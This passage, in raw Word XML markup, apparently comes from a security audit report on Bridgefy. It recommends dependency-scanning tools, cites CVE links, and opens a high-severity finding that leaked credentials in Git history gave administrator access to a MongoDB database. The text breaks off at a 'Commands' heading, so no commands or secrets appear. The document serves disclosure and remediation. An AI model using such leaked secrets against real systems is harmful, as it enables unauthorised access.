        <w:t>It is recommended to upgrade all outdated dependencies to their current versions. To avoid similar issues in the future, an automated task and/or commit hook should be created to regularly check for vulnerabilities in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>dependencies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solutions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could help in this area are the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>npm audit </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Snyk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>84</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Dependency Check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Ideally, such tools should be run regularly by an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>automated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>job</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>alerts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>lead</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>developer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in dependencies so that the patching process can start in a timely manner.</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0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487607296">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>186817</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="58" name="Graphic 58"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="58" name="Graphic 58"/>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4.710032pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15709184;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape45" coordorigin="1440,294" coordsize="2880,0" path="m1440,294l4320,294e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId140">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>0536</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="33"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId141">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2022-36083</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>82</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId142">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://security.snyk.io/package/npm/jose/2.0.5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="34"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId143">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://docs.npmjs.com/cli/v7/commands/npm-audit/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>84</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId144">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://snyk.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId145">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-dependency-check/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250034" w:id="21"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>repositories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>contain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hardcoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and/or fail to remove secrets from their Git history. A malicious attacker, with read-only access to clone the affected repositories, could leverage this weakness to escalate privileges and move laterally within the organization. For example, the leaked database authentication credentials were proven to provide administrator access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MongoDB database during this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>assignment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Furthermore,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>leaked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keys and Docker hub credentials. Please note only a few examples are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>here</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the sake of brevity. Additionally, during the documentation review, no process was found to identify and remove hardcoded credentials, rotation of credentials at fixed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>intervals or incident response mechanisms if a leak occurs. This issue was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="4231"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Affected Repositories: </w:t>
      </w:r>
      <w:hyperlink r:id="rId146">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-sdk-backend</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId147">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-app-backend</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId148">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://github.com/bridgefy/bridgefy-APP-infra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>perhaps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>best</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>demonstrated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>administrator access to the MongoDB database, which was confirmed as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
